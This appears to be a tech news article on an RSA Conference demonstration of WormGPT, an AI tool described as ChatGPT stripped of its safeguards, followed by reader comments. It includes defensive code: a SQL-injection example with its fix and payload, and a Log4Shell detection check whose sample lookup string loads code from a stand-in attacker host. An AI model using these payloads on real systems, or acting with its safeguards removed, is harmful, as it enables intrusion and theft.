At RSA Conference, experts reveal how "evil AI" is changing hacking forever

Skye Jacobs

A hot potato: A new wave of AI tools designed without ethical safeguards is empowering hackers to identify and exploit software vulnerabilities faster than ever before. As these "evil AI" platforms evolve rapidly, cybersecurity experts warn that traditional defenses will struggle to keep pace.

On a recent morning at the annual RSA Conference in San Francisco, attendees packed a room at the Moscone Center for what was billed as a technical exploration of artificial intelligence's role in modern hacking.

The session, led by Sherri Davidoff and Matt Durrin of LMG Security, promised more than just theory; it would offer a rare, live demonstration of so-called "evil AI" in action, a topic that has rapidly moved from cyberpunk fiction to real-world concern.

Davidoff, LMG Security's founder and CEO, set the stage with a sober reminder of the ever-present threat from software vulnerabilities. But it was Durrin, the firm's Director of Training and Research, who quickly shifted the tone, reports Alaina Yee, senior editor at PCWorld.

He introduced the concept of "evil AI" – artificial intelligence tools designed without ethical guardrails, capable of identifying and exploiting software flaws before defenders can react.

"What if hackers utilize their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?" Durrin asked the audience, previewing the unsettling demonstrations to come.

The team's attempts to acquire one of these rogue AIs, with candidates including GhostGPT and DevilGPT, usually ended in frustration or discomfort. Their persistence finally paid off when they tracked down WormGPT – a tool highlighted in a post by security journalist Brian Krebs – through Telegram channels for $50.

As Durrin explained, WormGPT is essentially ChatGPT stripped of its ethical constraints. It will answer any question, no matter how destructive or illegal the request. However, the presenters emphasized that the true threat lies not in the tool's existence but in its capabilities.

The LMG Security team began by testing an older version of WormGPT on DotProject, an open-source project management platform. The AI correctly identified a SQL vulnerability and proposed a basic exploit, though it failed to produce a working attack – likely because it couldn't process the entire codebase.
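
The article does not specify the exact flaw WormGPT flagged, but as a rough illustration of the vulnerability class it was hunting, here is a minimal Python sketch contrasting an injectable query with its parameterized fix. The tasks table and function names are hypothetical stand-ins, not DotProject code:

```python
import sqlite3

def find_task_unsafe(conn, task_name):
    # Vulnerable: user input is spliced directly into the SQL string, so
    # input like "x' OR '1'='1" rewrites the query's logic (or worse).
    query = "SELECT id, name FROM tasks WHERE name = '" + task_name + "'"
    return conn.execute(query).fetchall()

def find_task_safe(conn, task_name):
    # Fixed: a parameterized query treats the input strictly as data.
    return conn.execute(
        "SELECT id, name FROM tasks WHERE name = ?", (task_name,)
    ).fetchall()

if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tasks (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO tasks (name) VALUES ('public'), ('secret')")
    payload = "x' OR '1'='1"
    print(find_task_unsafe(conn, payload))  # returns every row
    print(find_task_safe(conn, payload))    # returns nothing
```

Running it with the classic "x' OR '1'='1" payload shows the unsafe version handing back every row while the parameterized version returns nothing.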

A newer version of WormGPT was then tasked with analyzing the infamous Log4j vulnerability. This time, the AI not only found the flaw but provided enough information that, as Davidoff observed, "an intermediate hacker" could use it to craft an exploit.
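
For context, Log4Shell (CVE-2021-44228) fires when attacker-controlled text containing a ${jndi:...} lookup gets logged by a vulnerable Log4j version, which then resolves the lookup and can load code from the attacker's server. Below is a minimal Python sketch of a naive input check; the pattern and sample strings are illustrative only, and real payloads routinely evade this kind of filter:

```python
import re

# Log4Shell (CVE-2021-44228) abuses Log4j's ${jndi:...} string lookup:
# if a logged value contains something like ${jndi:ldap://evil.example/a},
# vulnerable Log4j versions resolve the lookup and can load remote code.
# This check is a simplified heuristic, not a real defense -- payloads
# with nested lookups such as ${${lower:j}ndi:...} slip straight past it.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def looks_like_log4shell(user_input: str) -> bool:
    return bool(JNDI_PATTERN.search(user_input))

if __name__ == "__main__":
    for sample in ["normal search term", "${jndi:ldap://evil.example/a}"]:
        verdict = "suspicious" if looks_like_log4shell(sample) else "ok"
        print(f"{sample!r}: {verdict}")
```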

The real shock came with the latest iteration: WormGPT offered step-by-step instructions, complete with code tailored to the test server, and those instructions worked flawlessly.

To push the limits further, the team simulated a vulnerable Magento e-commerce platform. WormGPT uncovered a complex two-part exploit that had slipped past mainstream security tools like SonarQube – and even ChatGPT itself. During the live demonstration, the rogue AI produced a comprehensive hacking guide, unprompted and with alarming speed.

As the session drew to a close, Davidoff reflected on the rapid evolution of these malicious AI tools.

"I'm a little nervous about where we will [be] with hacker tools in six months because you can clearly see the progress that has been made over the past year," she said. The audience's uneasy silence echoed the sentiment, Yee wrote.

Image credit: PCWorld, LMG Security

 
Is anyone surprised?

With OpenAI, Apple, Microsoft, Google, and Amazon taking all sorts of illegal actions to train their own AI models by any means necessary, it's only natural for hackers to do the same.

At least the hackers aren't wolves dressed in sheep's clothing...
 
"What if hackers utilize their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?"
Surely someone will develop an AI-based penetration/vulnerability testing tool that software developers can use to check whether their applications have known vulnerabilities before releasing them to market. As new vulnerabilities are discovered, the test tool gets updated (see the sketch below for the rough shape of such a tool).

I really don't see this as any different from the antivirus/antimalware applications in use today, just with a focus on bug/vulnerability testing and AI driving the checks.
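
Tools in this vein already exist, but as a back-of-the-envelope sketch of the core loop, it might look something like this in Python. It assumes the openai v1.x client and an API key in the environment; the prompt text, model name, and scan_file helper are all hypothetical:

```python
from pathlib import Path

from openai import OpenAI  # assumes the openai v1.x Python package

client = OpenAI()  # reads OPENAI_API_KEY from the environment

PROMPT = (
    "You are a security reviewer. List potential vulnerabilities "
    "(SQL injection, XSS, path traversal, unsafe deserialization) in the "
    "following code, with line references. Reply 'OK' if none are found.\n\n"
)

def scan_file(path: Path) -> str:
    # Hypothetical helper: submit one source file for automated review.
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # placeholder; any capable model works
        messages=[{"role": "user", "content": PROMPT + path.read_text()}],
    )
    return response.choices[0].message.content

if __name__ == "__main__":
    for source in Path("src").rglob("*.py"):
        print(f"--- {source} ---")
        print(scan_file(source))
```

A production tool would chunk large codebases, deduplicate findings, and, as suggested above, refresh its prompts or models against a current vulnerability feed as new flaw classes emerge.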
 
AI is just a tool; it can't be evil lol

Otherwise, this is just the next logical step in the digital security arms race...
 
I think SonarQube has rolled out an AI-assisted code quality and penetration testing suite to perform simulated tests, but yes, OWASP and other open-source tools need to do the same: leverage AI against AI.
 
Humans are social creatures, and we're all instances of the same DNA. We're not inherently evil, but some may misbehave due to the harsh environments they must navigate to survive, and in some cases that makes them a problem for society.

However, democracy at its core is a peer-to-peer architecture, not a client-server system: it's built around citizens, not around a central authority. The more power you give to a central "server" to handle problems, the more power you, as a citizen, lose. As Margaret Thatcher once said, "Before you enter a room, you must know how you will exit." So before you hand power to a central authority to keep you secure, you must know how you will take it back. If you're unsure, stick with the peer-to-peer architecture for the long-term safety of your freedom. More "security" always means less freedom, and that is why social fear is toxic for democracy.
 
I have no fear of this impacting my home network. Professionally, there's always insurance for these things.
 